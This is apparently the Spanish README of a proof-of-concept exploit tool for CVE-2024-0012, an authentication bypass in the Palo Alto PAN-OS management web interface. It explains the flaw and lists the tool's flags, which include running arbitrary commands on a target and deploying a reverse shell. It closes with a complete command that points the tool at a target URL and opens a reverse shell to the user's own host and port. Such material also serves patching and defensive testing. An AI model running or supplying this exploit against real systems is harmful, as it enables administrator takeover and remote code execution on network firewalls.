
CVE-2024-0012 PAN-OS: Bypass de autenticación en la interfaz web de gestión (PAN-SA-2024-0015) RCE POC
CVE-2024-0012 es una omisión de autenticación en el software PAN-OS de Palo Alto Networks que permite a un atacante no autenticado con acceso de red a la interfaz web de gestión obtener privilegios de administrador de PAN-OS para realizar acciones administrativas, manipular la configuración o explotar otras vulnerabilidades de escalada de privilegios autenticadas.

| ❗ Descargo de responsabilidad |
|---|
| Este proyecto está construido principalmente para ser utilizado como una herramienta CLI independiente. Ejecutar este exploit como un servicio puede presentar riesgos de seguridad. Se recomienda usarlo con precaución y medidas de seguridad adicionales. DWYOR |
python3 cve-2024-0012.py -h
Esto mostrará la ayuda de la herramienta. Aquí están todos los modificadores que soporta.
Usage:
python3 cve-2024-0012.py [flags]
Flags:
-h, --help show this help message and exit
--url URL Target base URL (http:// or https://)
--no-verify Disable SSL verification
--timeout TIMEOUT Request timeout in seconds
--command COMMAND Command to execute on the target
--reverse-shell Deploy a reverse shell to the target
--lhost LHOST Local host for reverse shell connection (required for reverse shell)
--lport LPORT Local port for reverse shell connection (required for reverse shell)
Comando de shell inversa.
python3 cve-2024-0012.py --url "http://target.url" --no-verify --reverse-shell --lhost "your-ip" --lport 4444